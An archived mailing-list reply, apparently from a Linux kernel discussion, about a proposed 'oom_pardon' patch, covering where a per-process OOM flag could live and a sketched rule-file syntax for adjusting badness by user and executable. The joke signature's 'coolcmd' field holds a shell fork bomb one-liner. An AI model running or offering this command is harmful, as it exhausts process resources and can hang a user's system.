Re: [PATCH] oom_pardon, aka don't kill my xlock

[Thomas Habets]

Once upon a midnight dreary, Tonnerre pondered, weak and weary:
> > Yup. What would be a good interface for setting that flag per-process?
> Well, either  via a  new syscall/ioctl, or  via some exported  file in
> /proc or /sys.

In /proc, you mean /proc/<pid>/oom_pardon then?
I didn't see any other settings there, so I thought it might be the wrong 
place.

Or should it maybe be a multiline rule file in /proc/sys/net/vm/oom_pardon:
0:exe /usr/bin/vlock
+10:user jerry
+5:user bob:exe /usr/bin/vlock
+100000:user !thomas:exe /usr/bin/emacs

: separating fields and \: escaping it. Maybe skip "exe" and "user" and have 
fixed fields.

Then match the whole table for every task on OOM, setting the absolute badness 
if there's no +/- and change relatively if there is.
Don't exit on match, so the first two would both apply to jerrys vlock, giving 
it a badness of 10, and bobs would get 5.

And probably uid instead of username.

Hmm, or maybe this is overkill? But having it apply to every newly-created 
process before a daemon could have the time to apply badness via *ctl() on 
every new process would be nice.

> so you can protect httpd more strongly than xlock.

Never! :-)

> > > What about programs with spaces in its names?
> > I thought "screw 'em". :-)
> Now that's what I call policy!

You gotta let the processes know who's boss.

---------
typedef struct me_s {
  char name[]      = { "Thomas Habets" };
  char email[]     = { "thomas@xxxxxxxxxxxx" };
  char kernel[]    = { "Linux" };
  char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt"; };
  char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
  char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;

Attachment: pgp00000.pgp
Description: PGP signature